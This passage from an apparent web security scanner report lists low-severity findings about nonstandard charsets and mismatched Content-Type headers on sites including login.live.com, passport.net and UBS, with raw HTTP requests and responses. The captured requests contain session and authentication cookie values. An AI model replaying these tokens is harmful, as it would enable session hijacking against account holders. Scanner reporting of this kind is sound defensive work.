User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: adonmax.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:19:29 GMT
Server: Apache/2.2.19 (CentOS)
X-Powered-By: PHP/5.2.17
Set-Cookie: id=604085l37; expires=Sat, 06-Aug-2011 14:19:29 GMT
Content-Length: 334
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=uft8">
<title></title>
</head>
<body>
       <a href="htt
...[SNIP]...

24.2. http://cang.baidu.com/do/add

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://cang.baidu.com
Path:   /do/add

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /do/add?it=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&iu=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&fr=ien&dc= HTTP/1.1
Host: cang.baidu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:26 GMT
Server: apache 1.0.9.0
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Set-Cookie: BAIDUID=92E2D2F2A0513651099D245A96DCDBBE:FG=1; expires=Wed, 06-Jul-41 11:21:26 GMT; path=/; domain=.baidu.com
Content-Type: text/html
Cache-Control: no-cache
Connection: close
Content-Length: 7393

<?xml version="1.0" encoding="gb2312"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xh
...[SNIP]...
<head>
<meta content="text/html; charset=GB2312" http-equiv="content-type">
<title>
...[SNIP]...

25. Content type incorrectly stated
There are 12 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


25.1. http://a0.twimg.com/profile_images/534697216/MoMA_Twitter_Icon4_normal.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a0.twimg.com
Path:   /profile_images/534697216/MoMA_Twitter_Icon4_normal.gif

Issue detail

The response contains the following Content-type statement: The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/534697216/MoMA_Twitter_Icon4_normal.gif HTTP/1.1
Host: a0.twimg.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: 2R7/cqdGsVAd9FAQFI/8xuVbx3DQJPyoSpTepa4Qyq6KtMAhml6FeTVzri40fC2Z
x-amz-request-id: D98F6A057F73B07C
Last-Modified: Thu, 19 Nov 2009 22:50:19 GMT
ETag: "af2cabb308c3ca8203b70d63588b247f"
Accept-Ranges: bytes
Content-Length: 1690
Server: AmazonS3
X-Amz-Cf-Id: a415fcbc7cfa38e75c822e83635d23af15c4a9bcc56e5421754d04691bbf479cad13247eedf0cf39,58f5f4a65b5840a189a08e2ea2bc57d86b0936eec763c036e7e6977d0f6d6c16daa155c74a73a587
X-CDN: AKAM
X-CDN: AKAM
Cache-Control: max-age=24142482
Expires: Wed, 11 Apr 2012 00:15:48 GMT
Date: Wed, 06 Jul 2011 14:01:06 GMT
Connection: close
Content-Type: image/gif
X-CDN: AKAM

.PNG
.
...IHDR...0...0......`n....    pHYs...H...H.F.k>...    vpAg...0...0....W...7IDATX..X[l.U...efw.....E......... ...
.Z@!E..<.M...y......Z|...%.`...,.Zz..-.R"mh....vwfggg.9>L]I....y................B0.
...[SNIP]...

25.2. http://a1.twimg.com/profile_images/336090389/CM_linkedin_normal.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a1.twimg.com
Path:   /profile_images/336090389/CM_linkedin_normal.gif

Issue detail

The response contains the following Content-type statement: The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/336090389/CM_linkedin_normal.gif HTTP/1.1
Host: a1.twimg.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 15:39:20 GMT
Expires: Mon, 14 Jan 2019 19:51:34 GMT
Last-Modified: Tue, 28 Jul 2009 14:29:47 GMT
Cache-Control: max-age=252460800
Content-Type: image/gif
ETag: "6ded02a19e1b8a60037e577eea461a95"
Server: AmazonS3
X-Amz-Cf-Id: 8d29c451904da7f19a6683b477ac6fb6aab2e19c7f804b0daae2f20f70d6dbe67d627a1964a9ed31,84a89c105e189f9bc5a54542c8ac9bde01ae83bb0cde8c8c9784a69b42077f6ee2b2f7044958016a
x-amz-id-2: o2fpu5d6nDyo8DZLQrG2MvAByy1l9/DOmrCNerXyfgXBXGF1OqLf5OhYTusk5ZnB
x-amz-request-id: DE7E4591F30D3570
X-Cache: Miss from cloudfront
Content-Length: 5137

.PNG
.
...IHDR...0...0......`n....    pHYs...H...H.F.k>...    vpAg...0...0....W....IDATX..Xi..Wy~..m...]..sg...N...N.'.c.Y!);.J.
TD+~...m.(.ZU.T....P......H..Rp.H..$^.x.K...~g..}.Y.....-....t...{..]..}.!.
...[SNIP]...

25.3. https://accountservices.passport.net/gethip.srf

Summary

Severity:   Information
Confidence:   Firm
Host:   https://accountservices.passport.net
Path:   /gethip.srf

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /gethip.srf?lc=1033&fid=2044200945&id=75046&fre=hard&type=visual HTTP/1.1
Host: accountservices.passport.net
Connection: keep-alive
Referer: https://accountservices.passport.net/uiresetpw.srf?mkt=EN-US&lc=1033&id=75046
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CkTst=G1309951137024

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 19932
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:14 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
Set-Cookie: HIPSession=45S*6vuIWEDZGNM0*09htdJwOMobm7R5E2ZMW2RB2dSGkqC*apBp98w1vt43A3esAug*iHMBVLNvVAtuPikOTavfE!XPLQvoM*ecgi7xDXNJg$; domain=.passport.net;path=/;version=1
PPServer: PPV: 30 H: BAYIDSPROF1D05 V: 0
Date: Wed, 06 Jul 2011 11:21:13 GMT
Connection: close

var HIPM={name:"HIPM",innerFrame:null,comeinURLr:"",comeinURL:"",vv:"",eEmpty:"",eTooLong:"",eWrongAnswer:"",solutionElemt:"",afr:"audio",vfr:"visual",instruction:"",starttime:null,endtime:null,solnti
...[SNIP]...

25.4. http://api.mixpanel.com/track/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.mixpanel.com
Path:   /track/

Issue detail

The response contains the following Content-type statement: The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /track/?data=eyJldmVudCI6ICJtcF9wYWdlX3ZpZXciLCJwcm9wZXJ0aWVzIjogeyJtcF9icm93c2VyIjogIkNocm9tZSIsIm1wX3BsYXRmb3JtIjogIldpbmRvd3MiLCJtcF9wYWdlIjogImh0dHA6Ly93d3cuYmViby5jb20vIiwidG9rZW4iOiAiOTYxMTBkM2JmZGI3YmM3ZmYwYzNjM2U0MDhkMDIyMmIiLCJ0aW1lIjogMTMwOTk1MTMwNH19&ip=1&callback=mpmetrics.jsonp_callback&_=1309951304288 HTTP/1.1
Host: api.mixpanel.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 06 Jul 2011 11:22:09 GMT
Content-Type: text/javascript
Connection: close
Vary: Accept-Encoding
Expires: Wed, 06 Jul 2011 11:22:08 GMT
Access-Control-Max-Age: 1728000
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Allow-Headers: X-Requested-With
Content-Length: 28

mpmetrics.jsonp_callback(1);

25.5. http://blogs.technet.com/b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blogs.technet.com
Path:   /b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx

Issue detail

The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain CSS.

Request

POST /b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx
Content-Length: 1104
Origin: http://blogs.technet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=173653f; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; omniID=1306444613329_0b6a_7430_ae20_acaad3f30011; s_cc=true; s_sq=%5B%5BB%5D%5D

ctl00$content$ctl00$ctl00=custom%3Aid%3Dfragment-4667%26renderFromCurrent%3DTrue%26callback_control_id%3Dctl00%2524content%2524ctl00%2524w_4667%2524_96404d%2524ctl00%2524ctl00%2524DelayedFeedbackList%
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-FRAME-OPTIONS: SAMEORIGIN
Telligent-Evolution: 5.6.583.17018
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Pingback: http://blogs.technet.com/b/microsoft_blog/pingback.aspx
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
server: VBDNET09
Date: Wed, 06 Jul 2011 11:20:26 GMT
Content-Length: 1395

s{'response':'<input type="hidden" name="ctl00$content$ctl00$w_4667$_96404d$ctl00$ctl00$DelayedFeedbackList" value="true:undefined" \/>\r\n     \r\n     \r\n    ','includeScriptUrls':new Array('\/utility
...[SNIP]...

25.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2800593&PluID=0&w=300&h=250&ncu=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3tv7QUUUTsa3EM_ylAekkezuAa3mhMIBo5ejqBCFk__xOwAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi0xNzY3NDYzNTAzNTIwODY3oAGrl7rtA7IBDHd3dy5iZWJvLmNvbboBCjMwMHgyNTBfYXPIAQnaARRodHRwOi8vd3d3LmJlYm8uY29tL5gCxBPAAgXIApWysAvgAgDqAhlCZWJvX0hvbWVfMzAweDI1MF9BVEZMZWZ0qAMB6APCBOgD0wHoA_gD9QMAAIDB4AQBgAbPpJns29D66cwB%26num%3D1%26sig%3DAGiWqtwsO8bMZJ6jQcjqukrS_j5W81cmAg%26client%3Dca-pub-1767463503520867%26adurl%3Dhttp%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJyrVjI2VrJSMDI1NDHQUVAyNgJyzCwNzM1BPEMgRykkI8gtMNDR1d0i0ts0JCfAI6XYs8DR1lYJpBykwNzUyMAcxAPpNQHSpiAzDA0tgUwTIDOvNCcHyDQDiRobWBjXAgC0CRj.%2526redirectURL%253D&ord=ThRFQQAEG8YK5TlPHdsIpA==&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309951294291&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_Home_300x250_ATFLeft&page_slots=Bebo_Home_300x250_ATFLeft&cust_params=Age%3D&cookie=ID%3D5d1731d2d654c623%3AT%3D1309951294%3AS%3DALNI_MYs8-PBIDTpzhXnmr-Aos6FdpkB-w&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2F&lmt=1309969296&dt=1309951296825&cc=65&biw=1057&bih=822&ifi=1&adk=491404383&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&flash=10.3.181&gads=v2&ga_vid=570193707.1309951297&ga_sid=1309951297&ga_hid=2099858697
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; ActivityInfo=000dg4csN%5f000db5csN%5f000tbQcu6%5f000rFIcsM%5f000tbRcu6%5f; A3=gs35b0E.0ca7000009bExaZS0084o00002h8evaYRd0bI400000kYwuaZXq09MY00001kSEGaZWa03sY00001lp66b0xe0dMv00002lGhvb0Ah0cEt00003kPIlaZWa03sY00000kFaLa.2L09EZ00001jem9a.2L0c7wa.2L1kHgIb0v.02WG00001kLQDb0xt0cbO00001lEOyaYx40cie00001h51Tb0yn0ca700002eBxyaZST03iw00001h4.ob0xr0ca700002hePeb0wK0cbO00001l7XCa+WC08Y500001lzuRa+WF0ckj00001h4.pb0vz0ca700001h51Sb0Ah0ca700001lFP5aZRG0dSu00001lkqFa.2B06hH00001leMha.2F06hH00001jmcDa.2B0c7w00001jDBSaZUd0cbS00001kovFb0xt0cjc00002l.wtb0wj07Nz00001kSCsaZWb03sY00001le66b1nb02WG00001lGkWb0vy0cEt00001jmdZa.2F0c7w00001jDDva+WC0cbS00001jDCqa+WC0cbS00001hePyb0xq0cbO00001lu2rb0yg04m400001gs36b0xr0ca700000iyQIaYRd0bnA00001lu0naYvn0czN00002iz3QaZRG0bnA00001; B3=78ox0000000001vc835N0000000001vjanad0000000001vc990p0000000001v5atH70000000001vfawTK0000000002vjaFbT0000000001vmaKr10000000001vjaJmE0000000001vcajpm0000000001vcajpn0000000000vc9l7u0000000001vf8SCH0000000001vcamoJ0000000001v59xv30000000001vf9xvo0000000001vc82MD0000000003vjaF580000000001vk82MC0000000003vkaAsi0000000001vf9xv40000000001vf8n.z0000000000v9afgy0000000001vf838g0000000001vj9yJj0000000001vj8SC30000000001v982ME0000000000vjaHLh0000000001vfaF7y0000000002v89u4N0000000002vj838c0000000001vjawPH0000000001vf9.360000000001v89i8L0000000001vf82MA0000000000vkajpj0000000001vc90mq0000000001v54ZUH0000000002vc7dNF0000000001vjaKr20000000003vk

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=gs35b0E.0ca7000009bExaZS0084o00002kYwuaZXq09MY00001h8evaYRd0bI400000lGhvb0Ah0cEt00003lp66b0xe0dMv00002kSEGaZWa03sY00001kPIlaZWa03sY00000kHgIb0v.02WG00001jem9a.2L0c7wa.2L1kFaLa.2L09EZ00001lEOyaYx40cie00001kLQDb0xt0cbO00001h4.ob0xr0ca700002eBxyaZST03iw00001h51Tb0yn0ca700002h51Sb0Ah0ca700001h4.pb0vz0ca700001lzuRa+WF0ckj00001l7XCa+WC08Y500001hePeb0wK0cbO00001lzuXb3sV0ckj00001leMha.2F06hH00001lkqFa.2B06hH00001lFP5aZRG0dSu00001kovFb0xt0cjc00002jDBSaZUd0cbS00001jmcDa.2B0c7w00001kSCsaZWb03sY00001l.wtb0wj07Nz00001jDCqa+WC0cbS00001jDDva+WC0cbS00001jmdZa.2F0c7w00001lGkWb0vy0cEt00001le66b1na02WG00001hePyb0xq0cbO00001gs36b0xr0ca700000lu2rb0yg04m400001iz3QaZRG0bnA00001iyQIaYRd0bnA00001; expires=Tue, 04-Oct-2011 07:21:39 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=78ox0000000001vcawTK0000000002vjatH70000000001vf990p0000000001v5anad0000000001vc835N0000000001vjajpm0000000001vcaJmE0000000001vcaKr10000000001vjaFbT0000000001vm9l7u0000000001vfajpn0000000000vcamoJ0000000001v58SCH0000000001vc9xv30000000001vf9xvo0000000001vc82MD0000000003vj838g0000000001vjafgy0000000001vf8n.z0000000000v99xv40000000001vfaAsi0000000001vf82MC0000000003vkaF580000000001vk9yJj0000000001vj82ME0000000000vj8SC30000000001v99u4N0000000002vjaF7y0000000002v8aHLh0000000002vs9i8L0000000001vf9.360000000001v8awPH0000000001vf838c0000000001vjaKr20000000003vk7dNF0000000001vj4ZUH0000000002vc90mq0000000001v5ajpj0000000001vc82MA0000000000vk; expires=Tue, 04-Oct-2011 07:21:39 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 06 Jul 2011 11:21:39 GMT
Connection: close
Content-Length: 2366

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

25.7. https://login.live.com/pp1100/RDHelper_JS.srf

Summary

Severity:   Information
Confidence:   Firm
Host:   https://login.live.com
Path:   /pp1100/RDHelper_JS.srf

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /pp1100/RDHelper_JS.srf?x=11.0.18163.0&lc=1033 HTTP/1.1
Host: login.live.com
Connection: keep-alive
Referer: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&lc=1033&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wlidperf=throughput=2&latency=1884; Sample=17; MWTMsgr=1; MUID=E361C23374E642C998D8ABA7166A75EC; E=P:P/yZGuUJzog=:Kzhdi7iyZGIIP6617hxekA9uY0QbUMz6hwgjPGAdv04=:F; xid=4eaac30d-fa12-4b9e-a769-aec310f3e37a&&BL2xxxxxC664&230; xidseq=1; MSPRequ=lt=1309951118&id=75046&co=1; MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69; CkTst=G1309951121051

Response

HTTP/1.1 200 OK
Content-Length: 9536
Content-Type: text/html; charset=utf-8
Expires: Mon, 04 Jul 2016 11:20:54 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
PPServer: PPV: 30 H: BAYIDSLGN1E35 V: 0
Date: Wed, 06 Jul 2011 11:20:54 GMT
Connection: close


<!-- ServerInfo: BAYIDSLGN1E35 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
var k_fRealmNone=0,k_fRealmAllowWLIDSignIn=1<<0,k_fRealmAllowFedSignIn=1<<1,k_fRealmConflictInactive=1<<2,k_fRealmConfl
...[SNIP]...

25.8. https://manage.softlayer.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   https://manage.softlayer.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: manage.softlayer.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1306442258.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-1683070318-1308913155755; _mkto_trk=id:220-ESA-932&token:_mch-softlayer.com-1306437485169-98953; __utma=1.1168266774.1306437626.1306442258.1308913135.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:15:01 GMT
Server: Apache
Last-Modified: Tue, 02 Jun 2009 16:03:46 GMT
ETag: "84058b-e36-b0049c80"
Accept-Ranges: bytes
Content-Length: 3638
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding

..............h...&... ..............(....... ...........@...................................558.............    .......0/3.............325.........................326...................................
...[SNIP]...

25.9. https://nae.ubs.com/cache/app/RKC/1/ACEUrlDispatcherWeb/styles/nav_bottom_left.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   https://nae.ubs.com
Path:   /cache/app/RKC/1/ACEUrlDispatcherWeb/styles/nav_bottom_left.jpg

Issue detail

The response contains the following Content-type statement: The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /cache/app/RKC/1/ACEUrlDispatcherWeb/styles/nav_bottom_left.jpg HTTP/1.1
Host: nae.ubs.com
Connection: keep-alive
Referer: https://nae.ubs.com/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch?command=UrlRequest&urlReq=/quotes/markets_instruments?locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; NavLB_PQ=quotes-public1.ubs.com; ubslang=en-US; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309982088978:ss=1309981804815; NavLB_EB=ebanking2.ubs.com; PD-S-SESSION-ID=2_A7C3ZebL4esSGqSbaud57OPM7IqEBzFS2x-d1D1jkPtQxo0g

Response

HTTP/1.1 200 OK
p3p: CP="NON CUR OTPi OUR NOR UNI"
content-type: image/jpeg
age: 30369
date: Wed, 06 Jul 2011 05:28:54 GMT
Content-Length: 4795
content-language: en
server: Proxy/1.0
last-modified: Wed, 17 Mar 2010 14:25:14 GMT

GIF89a........8M.;U.>X!=U!>Y.@Z#B\(E]$Ea%Hc'Nk(Fa*Jd-Mi.Ql.Rq.X}1Mg0Ni2Sm8Qf8Uo3Uq4Vx5Yt5[{8Wq9Yr9Zt9\s9\u<[u=\v;]y6`|=a|@^w@_x@azAb}Bd~EbzDc~Ed~3_.8^.7b.5c.<c.:e.?h.>i.=l.Be.Ch.Bh.Fh.Fi.Gl.Ck.Ih.Ij.I
...[SNIP]...

25.10. https://nae.ubs.com/cache/app/RKC/1/ACEUrlDispatcherWeb/styles/nav_top_left.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   https://nae.ubs.com
Path:   /cache/app/RKC/1/ACEUrlDispatcherWeb/styles/nav_top_left.jpg

Issue detail

The response contains the following Content-type statement: The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /cache/app/RKC/1/ACEUrlDispatcherWeb/styles/nav_top_left.jpg HTTP/1.1
Host: nae.ubs.com
Connection: keep-alive
Referer: https://nae.ubs.com/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch?command=UrlRequest&urlReq=/quotes/markets_instruments?locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; NavLB_PQ=quotes-public1.ubs.com; ubslang=en-US; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309982088978:ss=1309981804815; NavLB_EB=ebanking2.ubs.com; PD-S-SESSION-ID=2_A7C3ZebL4esSGqSbaud57OPM7IqEBzFS2x-d1D1jkPtQxo0g

Response

HTTP/1.1 200 OK
p3p: CP="NON CUR OTPi OUR NOR UNI"
content-type: image/jpeg
age: 45446
date: Wed, 06 Jul 2011 01:17:40 GMT
Content-Length: 4870
content-language: en
server: Proxy/1.0
last-modified: Wed, 17 Mar 2010 14:25:14 GMT

GIF89a.........*..3..*
,.&6.$-.)3.2; .:"5<..B.3E./@.6D.<Q$5A$;D"8J+<D*>J.BK.AP#AL-BG,BL+HM"DR!HU-DP-KV-KZ1EN2HN3FQ3JS3MY9MT:NZ9R[.Ij4Tc1Xc;Va<Yc>\j<Tt>ft@V]@UbBZbA\jJ\eI^jE]rIbkEcrDizIdsLiuLk{SfkQeuS
...[SNIP]...

25.11. https://nae.ubs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   https://nae.ubs.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /favicon.ico HTTP/1.1
Host: nae.ubs.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; NavLB_PQ=quotes-public1.ubs.com; ubslang=en-US; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309982088978:ss=1309981804815; NavLB_EB=ebanking2.ubs.com; PD-S-SESSION-ID=2_A7C3ZebL4esSGqSbaud57OPM7IqEBzFS2x-d1D1jkPtQxo0g

Response

HTTP/1.1 200 OK
p3p: CP="NON CUR OTPi OUR NOR UNI"
content-type: text/plain
date: Wed, 06 Jul 2011 13:54:58 GMT
content-length: 224
last-modified: Thu, 10 Aug 2006 11:13:01 GMT

GIF89a.......___..................OOO......ooo///...???...................................................!.......,..........]`$.di.h....8...A$...4..A....0.x.........o... .(.rX."..B.t....1RX...G-1.
...[SNIP]...

25.12. http://s.bebo.com/js/mootools-core-and-more-1.3.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://s.bebo.com
Path:   /js/mootools-core-and-more-1.3.js

